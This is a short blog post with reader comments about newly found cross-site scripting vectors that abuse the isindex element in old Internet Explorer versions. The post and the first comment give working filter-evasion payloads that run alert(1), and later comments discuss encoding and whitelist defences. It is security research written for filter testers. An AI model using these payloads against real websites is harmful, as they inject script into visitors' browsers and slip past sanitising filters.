New XSS vector

Yes a XSS post again. I’m sorry 🙂

I’ve been having fun testing some really good filters (some of the best in the business IMO). I found a vector that isn’t on rsnake’s cheat sheet. Check it out:-

Only works on IE

<isindex type=image src=1 onerror=alert(1)>

Because IE treats the isindex element (a very old html element) as a input tag you can specify the same attributes and execute javascript.

Update…

Found another variation which is pretty cool:-

<isindex action=javascript:alert(1) type=image>

8 Responses to “New XSS vector”

  1. x-tense writes:

    You can remove the value of src attribute:

    <isindex type=image onerror=alert(1) src=>

    (only tested on IE6)

    Did you ask to rsnake to add this vector ?

  2. Gareth Heyes writes:

    Also works in IE8

    I’ll email him

  3. Gareth Heyes writes:

    Emailed rsnake but they won’t be added to the cheat sheet because there is no new event handler and javascript: is already mentioned

  4. superhei writes:

    hi Gareth Heyes

    good job
    it work in ie6/7/8

  5. Jim Manico writes:

    If only everyone had the power of

    ESAPI.encoder().encodeForHTMLAttribute(String userData);

    Great find, good job!

  6. Gareth Heyes writes:

    @jim

    Hey jim thanks, why don’t you put a online demo of ESAPI like Mario’s smoketest? Then we’ll see how good it is 🙂

  7. naughty.spanky.boy writes:

    Hi,

    I have an idea, for protecting websites against XSS attacks. Why not ban all the tags, and allow only predefined ones with ‘special’ care. Like, allow img only with src that starts with a http://, or allow a href but only if http https is found.

  8. Милан writes:

    Also works in IE8. thx